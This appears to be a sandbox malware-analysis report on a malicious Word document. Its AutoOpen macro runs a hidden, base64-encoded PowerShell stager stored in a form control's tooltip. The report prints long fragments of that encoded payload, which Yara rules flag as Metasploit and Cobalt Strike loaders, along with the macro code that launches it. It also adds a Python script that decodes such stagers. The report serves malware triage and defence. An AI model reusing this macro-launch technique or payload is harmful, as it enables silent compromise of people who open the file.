ArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANA
A1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEoATABPAFUASAA4AFoAbABMAFMAWABaAGMAYwBrAGsAdAB1ADEAeQArAHYAbQBPAFoASQB4AGMAUQBRAEUAMABJAFgASgB0AEQASQBXADQAMwBsAGIAeQBNAGwAWQByAE0AWQArAFMATABxAFgAUwBZAHQAWQBNACsASAB3AHMARABmADgAQQB2ADQASQBuAGgAWQBYAHkAQgBIADQAKwBIAGMANAArAGIAagB6AFUAKwBtAGsAdwBIADkATgBBAFEAWgA0ACsAOQBaAHAAUgBFAFkAcgBUAGcAYQBFAGEAZwBRAGUANwBOADcALwBPAEcARwBFAC8AYwBwADMAcABrAE4AKwB1ADYASgA4AFkAeQB6AEkAVQBQAC8AaQBEAHMAaQBYAEcAUABIAFQAUgA4AFYAMgBqAHYAegBNADcARgB6AGwAbAAvAHAAaQBaADEAZABTAE0ASwBEADIAcABmAGEAQQA1AFcAbwBaAEQASgBEADgAUwBZAEUALwB4AHUAeAA0AFgAeAB2AFIAaAAzADMAUwBIAG8AUABiAFkAOQBoADAAdgAwAEoAdQBhAEgAYgBiAHcAWgBhAHcAbABEAEgAagBIAGEAbgBkAEwAUgBxAHEATABRADkAZgA0AHEAbABjAGMAcgAzAHAATQBWAFIAeAArAHIAOQBaAGsAdwBsAE4AOABhAFAARABuAFIAKwBtAEIATwA2ADMAeQA0ADEAVgBjACsAegAwAHoAVgBrAFEAZAB4AGkAcwB4AE8AYQBUAHYARABWAEYARwA0AFYARAB0AEcAYgA5AE8AdQBkAE4AQQBHADgAbABnAGYAKwBZADgAdAAvAGEAMgBSAEMAbgBJAFQAYwBEAGcAcABxAGIAUwBmAHQAZgBXAFQAdABoAEUAUwBiAFMATwBQADAAOABHAFQAMwBBAGUANwBmAHIAVABlAE4AUQBlAFMAdwBvAEIAdABSAFQAOABsACsAagBLAGMARA
BCAGYAawBpAFoAawBpAHUANQBtAG0AVAByAE0AcgBIAHMAVABUAFcAUABQAEkAYQBqAE4AcwBCAHkAagB0AGUAbQBNAFQAcQA1AHgAQgBNAHQAMwBoAGUATABzAGIAZABuAGgAeQA5AGsAOQBSADUAcQBrAE8AdABxADMAQgBvAGoAYwBDADIAMAA1AFgAawBpAEEAWABxAEMAWABnAEoAYwBpAE0AUQBoAE4AcwBQAFEAYQArAGEARQBxAEgAdABIADMAUQBHAEQAbQBSAE4ATgA2AEsATgBHAFYAYQBDAFcAYwBwAE0AOQB1ADIATgBiAFIATgBlADEATwBXAFYAVQBlAGoAdwBUAEYAeABIAHcAUABQADkAOQB2AEgANwB0AE0AbQBsAFQAdgBpAGwASwA3AGcAVgBiAGgAdAB6AHAATgBPAEoAMwA2AG8AdAA3AG0ATgA5ADkAaABOAFYAOABhAHEAVwBUACsARQBnAHUAYgBlADcANwBYADcASgB1AEgAYQA0AFoANwBUACsAdQB6AFMAUABNADQAYQBpAC8AMABZADcAUgA0ADIAOQBwAHYASQBiAEcAZAB6AGkANQA4ADgASABlAGYAOQB4AFUAcgBiAHMAbwAyAFcAdABGADUANgAwAHcAVQB0AFMAawBKAEMATAA5AGkARQBzAEEAdQArAHQAWgBoAFoAKwBtAGkAMgA3AFAAVAA3AHIAQgB4AHAAZgBjADkAbQBUADYASABNAG4AMwBZADkASABmAEkAeABwADAALwBMAEoAUwBzAFQAUABaAEgAVwB2AGIAbgA0AHgARABMADYAWABEAG4AcQBtAGIAMwBjAFIAcAArAFYAWgBIAFcAOQBaAGQAZwBHAEYAMgBzAHoAYQBkADYAYgBTADcASwB3AGwANQBiADgAZgBEAFkAYQBtADgAZgBEAGsAOQBIAG4ARgBpAHUARgBuAC8ASAAzADkAbgAxAEwATgAxAHIAMwBoAHQAYwA5AEMASABIAHoAbgByAFYAWgBKADAAWgAxAHMANQBKADAAVgBOAHUAKwBmADIAagB2AHUAQwBXAHoAVwB3AFoAcgBtAGYAZQBUAEoAUgBUAEgAZABHAEcAZABqAEEAZQByADAAeAByAEYASgBwAHIAdQAyAC8AUABPAFEAZQBWAFgAWAB0AHcAUQBKAEgAbwBtAGUAWQByADkARwBEAC8ATQBrAFMASAB2AE8ARwA0AHQAVABmAGMASABvADgARgAxAFQAMgA5AG0AMwAyADUAQgBlAGIAbABuAHAAUQBSAFgAVQB0ACsAUgB1AGcATQBoAFUAdgB2AHQAbABoAEoASQBSAG8AZgBWAGUAZwA4AFQAZABEAEEAYgBpAHEAMAB2ADcAZgBVAG0AawBPAGwAVwB4AGQAZwBOAGoAcgBQAEoAawBDAEYAdgBLAGEATAA1AEoAYgA5ADEAagBVAHAAbwA4AFAANQBoADMARwBwAHQAagBIAHUATQBoAHMASgBoAHcAOQBVADMAawA5AFcARQA3AGYAZwB6AHQAeAAzAHYAcABXAEIAeQBhAEEANgBPAFgATABTAFAASgBrAG4ARgAwAFcASQBqAFgAcwA5AHAAUQAwAEwAcQAwADIAQwA2AE4AdwBiAE4AKwBrAFIAdwBMAFYATwBLAGgARwBhAEYANAA3AFoAYQBYAFcARwBTAFIARwA3AEsAdQAyADEAWABIAHQATQB0AHgATwBuAEEAVQAyAFUAdABqADgAVQAzADQARABNAGQASABzAFMARwBkAE4AQgA1ADgAcgBCAG4AZQBuADMAZwBZAFcASQBEAFgANABCAEgAWgBzAFUAWgBKAG4ANABJAFAARQAyAGwAbgBwAGoASwBHAFYAZABQAEIAQQBWAGMAegB0AFcANgBZAGYAbgBkAG0AZABrAGMAcQBRAGYAZwB5AEUATgBUAGkAawBZAFEAaABNAGIAdgBaAHkAdg
BJADEAWQBKAG4ANgBiAFUAdwBvADkAWAArAHgAVgBaAFcAagBRAHcAMwBnAFAANwBpAGwATgAzAFoALwA2AEwAZwAvADgANABpADEASAB1ADkAZwBTAG8ARABCAFMAeQBiAHIAMQBUAEsAMgBiADMALwB2AHYASgA4AGUAMwBxADUAOQBtAG4AdgA3ADMAZgBxAEMAYQB3AHgAcgBhAHgAMgA1AFMAcwB4ACsAbABDAHgAZgB0AFgAOABTAEMAZwBJADkAOABpAEMAUwBnAFkATgB6AFAAWAA2AEUAZAB4AEEAdQBMAFEAaABVADkAZgBNAE4ARQBxAGwAegB6AHYAbgBJAHcANABjAGIARQBGAFgAQwBYADMAbgB0AFcAaQB6AGwAdQBWAHEAVwBlAFAAMABpAHcANABHADIAcgBoAHoAYwAvAFUAQwBsADkATQBTAGgAawB6AGoAMAAxAEcAWgBlAGgAZQBFAGIAdQBrAGMAawB4AG8AWgBSAHQANQBjAFgAQwBLADgAOQBsAGgAWAB3AFMAOQBmAHQAaABCAGUAOQBRAE8ASQBZACsAegBzAHkATAA1AEsAMABTAGUARwBwAHUAbgBzAHYAMABtAFgAQwA3ADgAUABTADkAZgAxADAAdABLADcAdQBXAHIAVwBYAEgAMwB3ADUATwBOAE8AVgByADUAVAArAFkASgArAEUARABrADIALwBqADgAbQA0AEkAZABOAC8AegB1ADAARwBYAGgANQBmAC8AWQBPAFgAZQA3AFEANQAzAGkAVgBDADgAVQAvAEMAZwBYAFIAbwBEADcATQBoACsAWQBiAGYASAAxAGcAbgAzAHIATQB1AFIAYwBDAHoAYwBuAGQAdwBWAFgAaABVAHkAVwAvAGUAMAB1ADMAcQBFAHkASgAvAEkAYQA2AFIAZABSADMANgBnADcAQwBZADAATwBtAEEAZAA4AHIAdwBTADcASwBMAG0ATABxAC8AUABuADEAagBVAHEAUQBlAFYAYgA4AFIAcwAyAHgAaABxAEYAOQB2AGgAdQA2AEsAcgBBAFUAUQB6ACsAVgBtAGMANgBOAFoATQBJAHcAOQB6AGUAVQBZADgARgBrAHoAdwAwAEEAQQBBAD0APQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AAoA
        Imagebase:0x13fbd0000
        File size:473600 bytes
        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Yara matches:
        • Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000002.00000002.418638987.0000000002DA7000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, Author: Avast Threat Intel Team
        • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: WiltedTulip_WindowsTask, Description: Detects hack tool used in Operation Wilted Tulip - Windows Tasks, Source: 00000002.00000002.417824735.0000000000350000.00000004.00000020.sdmp, Author: Florian Roth
        • Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, Author: Avast Threat Intel Team
        • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, Author: Avast Threat Intel Team
        • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, Author: Avast Threat Intel Team
        • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000002.00000002.420980701.000000000389D000.00000004.00000001.sdmp, Author: Avast Threat Intel Team
        • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000002.00000002.420980701.000000000389D000.00000004.00000001.sdmp, Author: Joe Security
        Reputation:high

        General

        Start time:19:28:20
        Start date:15/11/2021
        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):true
        Commandline:"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        Imagebase:0x21f50000
        File size:452608 bytes
        MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Reputation:high

        Disassembly

        Code Analysis

        Call Graph

        Nodes: SquidGame_Click, CatchMeIfYouCan_Click, AutoOpen. AutoOpen is the entry point and the only executed function; it makes a single call to Shell (Shell:1). SquidGame_Click and CatchMeIfYouCan_Click are not executed. No decryption function was identified in the graph.

        Module: CatchMeIfYouCan

        Declaration
        Line  Content
        1     Attribute VB_Name = "CatchMeIfYouCan"
        2     Attribute VB_Base = "0{1EFEF94B-5D68-499E-896C-2EF23F0DFA0F}{91AFCBA1-38EA-4EEC-AA4D-8812B8EABB58}"
        3     Attribute VB_GlobalNameSpace = False
        4     Attribute VB_Creatable = False
        5     Attribute VB_PredeclaredId = True
        6     Attribute VB_Exposed = False
        7     Attribute VB_TemplateDerived = False
        8     Attribute VB_Customizable = False

        Non-Executed Functions
        Line  Instruction                              Meta Information
        9     Private Sub SquidGame_Click()
        11    End Sub

        Line  Instruction                              Meta Information
        13    Private Sub CatchMeIfYouCan_Click()
        15    End Sub

        Module: Module1

        Declaration
        Line  Content
        1     Attribute VB_Name = "Module1"

        Executed Functions
        APIs                                            Meta Information

        Shell (one call; the argument string is truncated by the report, the value after "->" is the return value):

        Shell("powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFA
AVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEoATABPAFUASAA4AFoAbABMAFMAWABaAGMAYwBrAGsAdAB1ADEAeQArAHYAbQBPAFoASQB4AGMAUQBRAEUAMABJAFgASgB0AEQASQBXADQAMwBsAGIAeQBNAGwAWQByAE0AWQArAFMATABxAFgAUwBZAHQAWQBNACsASAB3AHMARABmADgAQQB2ADQASQBuAGgAWQBYAHkAQgBIADQAKwBIAGMANAArAGIAagB6AFUAKwBtAGsAdwBIADkATgBBAFEAWgA0ACsAOQBaAHAAUgBFAFkAcgBUAGcAYQBFAGEAZwBRAGUANwBOADcALwBPAEcARwBFAC8AYwBwADMAcABrAE4AKwB1ADYASgA4AFkAeQB6AEkAVQBQAC8AaQBEAHMAaQBYAEcAUABIAFQAUgA4AFYAMgBqAHYAegBNADcARgB6AGwAbAAvAHAAaQBaADEAZABTAE0ASwBEADIAcABmAGEAQQA1AFcAbwBaAEQASgBEADgAUwBZAEUALwB4AHUAeAA0AFgAeAB2AFIAaAAzADMAUwBIAG8AUABiAFkAOQBoADAAdgAwAEoAdQBhAEgAYgBiAHcAWgBhAHcAbABEAEgAagBIAGEAbgBkAEwAUgBxAHEATABRADkAZgA0AHEAbABjAGMAcgAzAHAATQBWAFIAeAArAHIAOQBaAGsAdwBsAE4AOABhAFAARABuAFIAKwBtAEIATwA2ADMAeQA0ADEAVgBjACsAegAwAHoAVgBrAFEAZAB4AGkAcwB4AE8AYQBUAHYARABWAEYARwA0AFYARAB0AEcAYgA5AE8AdQBkAE4AQQBHADgAbABnAGYAKwBZADgAdAAvAGEAMgBSAEMAbgBJAFQAYwBEAGcAcABxAGIAUwBmAHQAZgBXAFQAdABoAEUAUwBiAFMATwBQADAAOABHAFQAMwBBAGUANwBmAHIAVABlAE4AUQBlAFMAdwBvAEIAdABSAFQAOABsACsAagBLAGMARABCAGY
AawBpAFoAawBpAHUANQBtAG0AVAByAE0AcgBIAHMAVABUAFcAUABQAEkAYQBqAE4AcwBCAHkAagB0AGUAbQBNAFQAcQA1AHgAQgBNAHQAMwBoA) -> 1292

        SquidGame

        Strings / Decrypted Strings
        "powershell -nop -w hidden -encodedcommand "

        Line  Instruction                                                                                      Meta Information
        2     Sub AutoOpen()
        3     Shell "powershell -nop -w hidden -encodedcommand " & CatchMeIfYouCan.SquidGame.ControlTipText
              Shell("powershell -nop -w hidden -encodedcommand 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) -> 1292   SquidGame, executed
        4     End Sub

        AutoOpen fires when the document is opened. The module source holds only the fixed "powershell -nop -w hidden -encodedcommand " prefix; the base64 argument itself is stored in the ControlTipText (tooltip) property of the SquidGame control on the CatchMeIfYouCan form, so it never appears in the macro text and is only assembled at runtime. The Shell call returns 1292, the task ID of the PowerShell process it started, which is why a static string scan of the VBA modules alone does not reveal the payload and the form's control properties have to be inspected as well.
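        Decoding the command line the macro assembles is the first triage step. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it decodes an -encodedcommand argument (base64 of the UTF-16LE script text, which is why the argument on this page begins JABzAD0A, i.e. "$s="), pulls the inner FromBase64String("H4sI...") blob out of the loader, checks the gzip magic and inflates it to the next stage. The loader layout it assumes is the one visible at the decoded tail of the report's own command line (IO.MemoryStream / IO.Compression.GzipStream / IEX ... .ReadToEnd()). The stage text, the build_stager helper and the INDICATORS list are constructed for the example only; the report's real second stage is truncated on this page and is not reproduced.

```python
"""Unwrap a Metasploit-style PowerShell gzip/base64 stager of the kind the
AutoOpen macro above launches. Added example, not code from the report.

Assumed loader layout (matches the decoded tail of the report's command line):
  $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sI..."));
  IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,
      [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
"""
import base64
import gzip
import re

# Fixed prefix exactly as AutoOpen builds it; ControlTipText supplies the rest.
SHELL_PREFIX = "powershell -nop -w hidden -encodedcommand "

# Loader template used only to construct a sample for this example.
LOADER_TEMPLATE = (
    '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("{blob}"));'
    'IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,'
    '[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();\n'
)

# Constructed triage hints (the report's Yara rules key on FromBase64String);
# presence is a hint for analysts, not a verdict.
INDICATORS = ("FromBase64String", "GzipStream", "IEX", "-w hidden", "-encodedcommand")


def build_stager(stage_script: str) -> str:
    """Wrap a plain-text stage the way the macro's payload is wrapped (sample only)."""
    blob = base64.b64encode(gzip.compress(stage_script.encode("utf-8"))).decode("ascii")
    loader = LOADER_TEMPLATE.format(blob=blob)
    # -encodedcommand expects base64 of the UTF-16LE encoded script text.
    return SHELL_PREFIX + base64.b64encode(loader.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the script text carried by -encodedcommand / -enc / -ec / -e."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        raise ValueError("no -encodedcommand argument found")
    raw = base64.b64decode(m.group(1), validate=True)
    return raw.decode("utf-16-le")


def extract_gzip_stage(script: str) -> str:
    """Pull the FromBase64String(...) blob out of the loader and gunzip it."""
    m = re.search(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"\s*\)', script)
    if not m:
        raise ValueError("no FromBase64String blob in loader")
    blob = base64.b64decode(m.group(1))
    if blob[:2] != b"\x1f\x8b":  # gzip magic; base64 of it is the "H4sI" seen on the page
        raise ValueError("blob is not gzip (no 1f 8b magic)")
    return gzip.decompress(blob).decode("utf-8", errors="replace")


def unwrap(cmdline: str) -> dict:
    """Full pipeline: command line -> loader text -> inflated stage -> indicator list."""
    loader = decode_encoded_command(cmdline)
    stage = extract_gzip_stage(loader)
    return {
        "loader": loader,
        "stage": stage,
        "indicators": [i for i in INDICATORS if i in cmdline or i in loader],
    }


# Constructed placeholder stage; the report's real second stage is not reproduced.
SAMPLE_STAGE = (
    "# constructed placeholder stage for this example\n"
    "Write-Output 'stage-2 would run here'\n"
)
SAMPLE_CMDLINE = build_stager(SAMPLE_STAGE)

if __name__ == "__main__":
    result = unwrap(SAMPLE_CMDLINE)
    print("indicators:", ", ".join(result["indicators"]))
    print("loader head:", result["loader"][:60])
    print("stage:\n" + result["stage"])
```

        To apply it to the report, paste the full -encodedcommand argument (the report splits it across several lines, so rejoin them first) into decode_encoded_command; the inflated stage is the msf-ref.ps1 style reflective loader the Yara rules matched, and that is where the C2 address lives.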

        Module: ThisDocument

        Declaration
        Line  Content
        1     Attribute VB_Name = "ThisDocument"
        2     Attribute VB_Base = "1Normal.ThisDocument"
        3     Attribute VB_GlobalNameSpace = False
        4     Attribute VB_Creatable = False
        5     Attribute VB_PredeclaredId = True
        6     Attribute VB_Exposed = True
        7     Attribute VB_TemplateDerived = True
        8     Attribute VB_Customizable = True

          Executed Functions

          Memory Dump Source (shared by every function entry below)
          • Source File: 00000002.00000002.423250356.000007FF00290000.00000040.00000001.sdmp, Offset: 000007FF00290000, based on PE: false
          • Joe Sandbox IDA Plugin, Snapshot File: hcaresult_2_2_7ff00290000_powershell.jbxd
          • Similarity: API ID, String ID and API String ID are empty unless stated
          • Opcode Fuzzy Hash is identical to the Opcode ID for every entry
          • Uniqueness Score: -1.00% for every entry

          Function 1
          • Opcode ID: bc8045bb69bd3fae8819728d3b78aca5664e355319c9e835a5af5102625e6334
          • Instruction ID: df25a597e7f159dcc436fd2b185828b74fa5b7bf2cebd4f1d09558d06397614a
          • Instruction Fuzzy Hash: BFA1C43061CB884FF355EB2C94457AABBD2FF99300F5845AEE48DC72A3DE7898058746

          Function 2
          • Opcode ID: af0b57347394caa010ec4da5eb9f230bc32aa1bd405c46753b9a4410e41af9f5
          • Instruction ID: 922c3150d72b7303925b853f7d670bc3d96335d07ea36a82eef6755d727a7f8f
          • Instruction Fuzzy Hash: B541933060CB488FDB85EB2CD485B66BBE1FBA9305F1405AFE48DC7262DB75D8458B42

          Function 3
          • Opcode ID: 2cff2c29dba6492492c70a80338b491e29428863ba88471fd52e88b8e36c1d7d
          • Instruction ID: d2353868636086f37b741a77d3a8ddd3add150eded23ad530635a0cdc7755459
          • Instruction Fuzzy Hash: 1521AE71508A8C8FE751DF28D858BE97FA0FF49344F2501ABE84CC7292CB789948C791

          Function 4
          • Opcode ID: 8a70c0a7d4e69cd02fd9a8b0bdf1afcbbf795d86786f3436eef0d9ad490706cf
          • Instruction ID: 74e67bba545c9c1b0618746b3e66be649c62f1b569acf237f6be443b345dffdb
          • Instruction Fuzzy Hash: E611C83061CF4E0FD750EB2C9899B35BBD0FBA8315F04027AE94CC3262DA64D9418745

          Function 5
          • Opcode ID: 4054996f9014a9145151bcb91390baa7f51ae2ff5e5b8b5172c29ee5ac188731
          • Instruction ID: b8687908ef95c13342cb6864dd7c7e1bb2019c0b57ca08cbcd5b734269bbb56b
          • Instruction Fuzzy Hash: DBF0AF8594E7C91FE70B137859616A07FB19F57240B5A00E7D984CE2E7E8090E998366

          Function 6
          • Opcode ID: ac0b43a2fdc689351051ca9f4d78bd8f22de49c021490e0aca79c65177ebedd2
